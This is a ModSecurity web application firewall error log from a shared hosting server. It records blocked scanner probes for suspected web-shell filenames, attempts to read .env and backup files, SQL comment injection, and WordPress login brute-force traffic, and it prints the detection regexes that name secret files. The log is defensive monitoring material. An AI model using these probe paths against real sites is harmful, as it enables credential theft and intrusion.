[Tue May 26 14:46:51.048799 2026] [security2:error] [pid 648203:tid 648419] [client 20.12.190.196:55566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMGQAAANs"]
[Tue May 26 14:46:51.048887 2026] [security2:error] [pid 648203:tid 648419] [client 20.12.190.196:55566] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/zoo.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMGQAAANs"]
[Tue May 26 14:46:51.977927 2026] [security2:error] [pid 648203:tid 648355] [client 20.12.190.196:55627] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMLgAAAJs"]
[Tue May 26 14:46:51.978063 2026] [security2:error] [pid 648203:tid 648355] [client 20.12.190.196:55627] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-spm.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMLgAAAJs"]
[Tue May 26 14:46:52.053247 2026] [security2:error] [pid 648203:tid 648440] [client 209.50.171.254:9695] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 254.171.50.209.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlA7EQDDtxJNiDrdTMJwAAAPA"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:52.436012 2026] [security2:error] [pid 648203:tid 648381] [client 20.12.190.196:55577] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNAAAALU"]
[Tue May 26 14:46:52.436113 2026] [security2:error] [pid 648203:tid 648381] [client 20.12.190.196:55577] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/wp-link-snpm.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNAAAALU"]
[Tue May 26 14:46:52.870311 2026] [security2:error] [pid 648203:tid 648405] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBLEQDDtxJNiDrdTMNgAAAM0"]
[Tue May 26 14:46:54.240048 2026] [security2:error] [pid 648203:tid 648335] [client 65.111.31.251:16931] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlBbEQDDtxJNiDrdTMWAAAAIc"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:54.965541 2026] [security2:error] [pid 648203:tid 648389] [client 20.12.190.196:55624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMiwAAAL0"]
[Tue May 26 14:46:54.965688 2026] [security2:error] [pid 648203:tid 648389] [client 20.12.190.196:55624] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/xminie.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMiwAAAL0"]
[Tue May 26 14:46:54.997112 2026] [security2:error] [pid 648203:tid 648421] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMgwAAAN0"]
[Tue May 26 14:46:55.070722 2026] [security2:error] [pid 648203:tid 648384] [client 66.249.64.42:44876] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlBrEQDDtxJNiDrdTMdwAAALg"], referer: https://mosykay.com/prizes/305300541
[Tue May 26 14:46:55.703153 2026] [security2:error] [pid 648203:tid 648439] [client 20.12.190.196:55591] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMrgAAAO8"]
[Tue May 26 14:46:55.703254 2026] [security2:error] [pid 648203:tid 648439] [client 20.12.190.196:55591] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/bal.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMrgAAAO8"]
[Tue May 26 14:46:55.949249 2026] [security2:error] [pid 648203:tid 648438] [client 208.84.100.109:51944] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/backend/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMywAAAO4"]
[Tue May 26 14:46:55.949416 2026] [security2:error] [pid 648203:tid 648441] [client 208.84.100.109:51934] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/api/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMzAAAAPE"]
[Tue May 26 14:46:55.950535 2026] [security2:error] [pid 648203:tid 648426] [client 208.84.100.109:51932] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/app/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTMzQAAAOI"]
[Tue May 26 14:46:55.953535 2026] [security2:error] [pid 648203:tid 648404] [client 208.84.100.109:51910] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.cagmedya.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahVlB7EQDDtxJNiDrdTM0AAAAMw"]
[Tue May 26 14:46:56.488127 2026] [security2:error] [pid 648203:tid 648350] [client 216.26.225.4:20683] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlB7EQDDtxJNiDrdTMmAAAAJY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:57.240980 2026] [security2:error] [pid 648203:tid 648338] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlCLEQDDtxJNiDrdTM8wAAAIo"]
[Tue May 26 14:46:57.737505 2026] [security2:error] [pid 648203:tid 648372] [client 199.187.124.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNBgAAAKw"]
[Tue May 26 14:46:57.756256 2026] [security2:error] [pid 648203:tid 648392] [client 20.12.190.196:55655] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNDAAAAMA"]
[Tue May 26 14:46:57.756369 2026] [security2:error] [pid 648203:tid 648392] [client 20.12.190.196:55655] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/drykl.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNDAAAAMA"]
[Tue May 26 14:46:58.372435 2026] [security2:error] [pid 648203:tid 648414] [client 20.12.190.196:55609] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNGgAAANY"]
[Tue May 26 14:46:58.372563 2026] [security2:error] [pid 648203:tid 648414] [client 20.12.190.196:55609] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/av.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNGgAAANY"]
[Tue May 26 14:46:58.524277 2026] [security2:error] [pid 648203:tid 648277] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/backend/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNIQAA40k"]
[Tue May 26 14:46:58.528434 2026] [security2:error] [pid 648203:tid 648278] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.koneksi.jhonweb.com"] [uri "/*update.cgi*"] [unique_id "ahVlCrEQDDtxJNiDrdTNJAAA40o"]
[Tue May 26 14:46:58.532254 2026] [security2:error] [pid 648203:tid 648282] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNKQAA404"]
[Tue May 26 14:46:58.763929 2026] [security2:error] [pid 648203:tid 648404] [client 104.207.45.111:53759] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlCbEQDDtxJNiDrdTNCAAAAMw"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:46:59.215157 2026] [security2:error] [pid 648203:tid 648433] [client 85.204.70.106:46088] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "avprealty.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahVlC7EQDDtxJNiDrdTNPAAAAOk"]
[Tue May 26 14:46:59.449297 2026] [security2:error] [pid 648203:tid 648369] [client 20.12.190.196:55647] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNRQAAAKk"]
[Tue May 26 14:46:59.449397 2026] [security2:error] [pid 648203:tid 648369] [client 20.12.190.196:55647] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/11.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNRQAAAKk"]
[Tue May 26 14:46:59.516202 2026] [security2:error] [pid 648203:tid 648362] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNOQAAAKI"]
[Tue May 26 14:46:59.588290 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJwAA41A"]
[Tue May 26 14:46:59.591590 2026] [security2:error] [pid 648203:tid 648311] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.docker/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNSgAA42s"]
[Tue May 26 14:46:59.593421 2026] [security2:error] [pid 648203:tid 648299] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVlCrEQDDtxJNiDrdTNTAAA418"]
[Tue May 26 14:46:59.599834 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNIgAA40Y"]
[Tue May 26 14:46:59.600266 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNIwAA408"]
[Tue May 26 14:46:59.601101 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJQAA40k"]
[Tue May 26 14:46:59.732418 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNJgAA41g"]
[Tue May 26 14:46:59.732772 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNKgAA404"]
[Tue May 26 14:46:59.734168 2026] [security2:error] [pid 648203:tid 648306] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env"] [unique_id "ahVlC7EQDDtxJNiDrdTNVAAA42Y"]
[Tue May 26 14:46:59.882814 2026] [security2:error] [pid 648203:tid 648309] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env.backup"] [unique_id "ahVlC7EQDDtxJNiDrdTNWwAA42k"]
[Tue May 26 14:47:00.023412 2026] [security2:error] [pid 648203:tid 648297] [remote 195.178.110.199:43126] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.koneksi.jhonweb.com"] [uri "/.env.bak"] [unique_id "ahVlDLEQDDtxJNiDrdTNXAAA410"]
[Tue May 26 14:47:00.026733 2026] [security2:error] [pid 648203:tid 648434] [client 85.204.70.106:46096] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.70.204.85.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/xmlrpc.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNWAAAAOo"]
[Tue May 26 14:47:00.400330 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNRwAA41w"]
[Tue May 26 14:47:00.441877 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVgAA42c"]
[Tue May 26 14:47:00.442164 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNTQAA42s"]
[Tue May 26 14:47:00.771422 2026] [security2:error] [pid 648203:tid 648411] [client 20.12.190.196:55661] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.190.12.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNewAAANM"]
[Tue May 26 14:47:00.771532 2026] [security2:error] [pid 648203:tid 648411] [client 20.12.190.196:55661] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cbdcredentials.com.md-74.webhostbox.net"] [uri "/77.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNewAAANM"]
[Tue May 26 14:47:00.981698 2026] [security2:error] [pid 648203:tid 648382] [client 104.167.25.217:54375] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNVwAAALY"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:47:01.280956 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXQAA42o"]
[Tue May 26 14:47:01.286483 2026] [security2:error] [pid 648203:tid 648295] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSQAA41s"]
[Tue May 26 14:47:01.287455 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNYAAA420"]
[Tue May 26 14:47:01.291563 2026] [security2:error] [pid 648203:tid 648294] [remote 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlCrEQDDtxJNiDrdTNSAAA41o"]
[Tue May 26 14:47:01.293945 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlC7EQDDtxJNiDrdTNWgAA42g"]
[Tue May 26 14:47:01.296693 2026] [security2:error] [pid 648203:tid 648427] [client 195.178.110.199:43126] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.koneksi.jhonweb.com"] [uri "/index.php"] [unique_id "ahVlDLEQDDtxJNiDrdTNXgAA42w"]
